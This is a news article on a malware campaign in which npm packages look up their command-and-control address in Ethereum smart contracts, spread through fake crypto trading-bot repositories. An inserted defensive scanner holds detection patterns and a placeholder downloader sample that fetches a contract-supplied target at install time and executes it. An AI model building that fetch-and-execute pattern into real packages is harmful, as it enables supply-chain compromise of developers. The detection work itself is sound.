Cryptopolitan, September 4, 2025

Hackers load Ethereum smart contracts with hidden malware

ReversingLabs research uncovered a malware campaign that used Ethereum smart contracts to conceal malicious software. The findings revealed that the hackers used the npm packages colortoolsv2 and mimelib2, which acted as downloaders. Once the npm packages have been installed, they fetch second-stage malware from a command and control (C2) infrastructure by querying Ethereum smart contracts. ReversingLabs researcher Lucija Valentic described the attack as creative, noting that it has not been seen before. The attackers' approach bypassed traditional scans that typically flag suspicious URLs inside packages.

Threat actors hide malware in plain sight

Ethereum smart contracts are public programs that automate blockchain transactions. In this case, they enabled hackers to hide malicious code in plain sight. The malicious payloads were hidden with a simple downloader file, which, when executed, reached out to the blockchain to retrieve the command and control (C2) server address. According to ReversingLabs' research, downloader packages are not standard on npm, and blockchain hosting marked a new stage in evasion tactics.

The discovery prompted researchers to scan widely across GitHub, where they discovered that the npm packages were embedded in repositories posing as cryptocurrency trading bots. The bots were disguised as Solana-trading-bot-v2, Hyperliquid-trading-bot-v2, and many others. The repositories were disguised as professional tools, attracting multiple commits, contributors, and stars, but in reality they were fakes. According to the research, accounts that performed commits or forked the repositories were created in July and did not show any coding activity. Some of the accounts had a README file embedded in their profiles. It was uncovered that the commit counts were artificially generated via an automated process to inflate coding activity. For instance, most commits logged were just license file changes rather than meaningful updates.
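The detection gap the article points at is that a downloader which asks a smart contract for its C2 address carries no URL literal, so URL-flagging scanners see nothing. The following is an added example, not code from the Cryptopolitan article or from ReversingLabs: a small heuristic pre-install scanner that instead looks for the combination of an install lifecycle hook, an Ethereum client or contract read, an outbound fetch with no URL literal, and dynamic code execution. All package names, file contents and indicator lists below are constructed for the demo; the suspicious sample is a non-working sketch with placeholder identifiers.

```javascript
// Added example, not code from the Cryptopolitan article or from ReversingLabs.
// A heuristic pre-install scanner for npm packages that looks for the pattern the
// article describes: an install lifecycle hook running code that resolves its
// download location from an Ethereum smart contract rather than a hard-coded
// URL, then fetches and executes what it gets. Everything below (indicator
// lists, package names, file contents) is constructed for the demo.

// Signs that the code reads from an Ethereum node or contract.
const CHAIN_READ = [
  /\brequire\(['"](ethers|web3)['"]\)/,
  /\bfrom\s+['"](ethers|web3)['"]/,
  /\bnew\s+ethers\.Contract\b/,
  /\beth_call\b/,
  /\.eth\.Contract\b/,
];
// Signs that fetched data is turned into running code.
const DYNAMIC_EXEC = [/\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bchild_process\b/, /\bvm\.runIn\w+\(/];
// Signs of an outbound request.
const NET_FETCH = [/\bfetch\s*\(/, /\brequire\(['"]https?['"]\)/, /\baxios\b/];
// A plain URL literal; its absence is what lets the chain-resolved variant slip past URL-based scanners.
const URL_LITERAL = /https?:\/\/[^\s'"`]+/;
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

const anyMatch = (patterns, text) => patterns.some((p) => p.test(text));

// pkg = { manifest: <parsed package.json>, files: { 'path': 'source text', ... } }
// Returns a list of { code, detail } findings; an empty list means nothing matched.
function scanPackage(pkg) {
  const findings = [];
  const scripts = pkg.manifest.scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => h in scripts);
  if (hooks.length > 0) {
    findings.push({ code: 'INSTALL_HOOK', detail: hooks.map((h) => `${h}: ${scripts[h]}`).join('; ') });
  }
  for (const [path, src] of Object.entries(pkg.files)) {
    const chain = anyMatch(CHAIN_READ, src);
    const exec = anyMatch(DYNAMIC_EXEC, src);
    const net = anyMatch(NET_FETCH, src);
    if (chain && net) findings.push({ code: 'CHAIN_RESOLVED_FETCH', detail: path });
    if (chain && exec) findings.push({ code: 'CHAIN_THEN_EXEC', detail: path });
    if (net && !URL_LITERAL.test(src)) findings.push({ code: 'FETCH_WITHOUT_URL_LITERAL', detail: path });
  }
  return findings;
}

// Collapse findings into a triage level for an install-time policy gate.
function riskLevel(findings) {
  const codes = new Set(findings.map((f) => f.code));
  if (codes.has('INSTALL_HOOK') && codes.has('CHAIN_THEN_EXEC')) return 'high';
  if (codes.has('CHAIN_THEN_EXEC') || codes.has('CHAIN_RESOLVED_FETCH')) return 'medium';
  return codes.size > 0 ? 'low' : 'none';
}

// Constructed sample: an ordinary utility package with no install hooks.
const benignPackage = {
  manifest: { name: 'demo-color-utils', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: {
    'index.js': "module.exports = { hex: (r, g, b) => '#' + [r, g, b].map((v) => v.toString(16).padStart(2, '0')).join('') };",
  },
};

// Constructed sample of the suspicious shape (placeholders, not a working downloader):
// a postinstall hook runs a file that asks a contract for its target, fetches it and runs it.
const suspiciousPackage = {
  manifest: { name: 'demo-colortools', version: '2.0.1', scripts: { postinstall: 'node lib/setup.js' } },
  files: {
    'index.js': "module.exports = require('./lib/colors');",
    'lib/setup.js': [
      "const ethers = require('ethers');",
      'const c = new ethers.Contract(CONTRACT_ADDR, ABI, provider);',
      'c.getTarget().then((t) => fetch(t)).then((r) => r.text()).then((s) => new Function(s)());',
    ].join('\n'),
  },
};

// Human-readable summary, one line per finding.
function report(pkg) {
  const findings = scanPackage(pkg);
  return [`${pkg.manifest.name}@${pkg.manifest.version}: risk=${riskLevel(findings)}`]
    .concat(findings.map((f) => `  ${f.code} (${f.detail})`))
    .join('\n');
}

console.log(report(benignPackage));
console.log(report(suspiciousPackage));
```

The point of scoring combinations rather than single indicators is that each one alone is common in legitimate packages (many honest libraries import ethers, many have postinstall hooks); it is a chain read feeding a fetch whose result is executed, triggered at install time, that matches the campaign's shape. A real gate would run this over the unpacked tarball before `npm install` is allowed to execute hooks, or with `--ignore-scripts` as the default.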

Pasttimerles, a handle used by one maintainer, was notably used to share many commits. Slunfuedrac, another handle, was tied to the inclusion of the malicious npm packages into the project. Once detected, the hackers kept switching dependencies to different packages. After colortoolsv2 was detected, they switched to mimelib2 and subsequently to mw3ha31q and cnaovalles, which contributed to the commit inflation and placement of malicious dependencies, respectively. ReversingLabs' research linked the activity to Stargazer's Ghost Network, a coordinated system of accounts that boosts the credibility of malicious repositories. The attack targeted developers who seek open-source cryptocurrency tools and might mistake inflated GitHub statistics for legitimacy.

Blockchain malware embedding marks a new phase in threat detection

The uncovered attack follows a series of attacks targeting the blockchain ecosystem. In March 2025, ReversingLabs uncovered other malicious npm packages that patched legitimate Ethers packages with code that enabled reverse shells.

The ethers-provider2 and ethers-providerz npm packages contained malicious code that enabled reverse shells. Earlier cases, including the compromise of PyPI's ultralytics package in December 2024, were also revealed to be delivering cryptocurrency mining malware. Other incidents included trusted platforms like Google Drive and GitHub Gist being used to mask malicious code via C2 infrastructure. According to the research, 23 crypto-related supply chain incidents were recorded in 2024, ranging from malware to credential theft. The latest discovery employs old tricks but introduces the Ethereum contracts approach as a new mechanism. Valentic, the ReversingLabs researcher, said the discovery highlights the fast evolution of detection evasion strategies by malicious actors trolling open-source projects and repositories. The research highlighted the importance of verifying open-source libraries' legitimacy before use. She warned that developers must assess each library they are considering before including it in their development projects. She added that it was clear that indicators such as stars, commits, and the number of maintainers can be easily faked. The identified npm packages, colortoolsv2 and mimelib2, have since been removed from npm and the associated GitHub accounts closed, but the activity has shed light on how the software threat ecosystem is evolving.
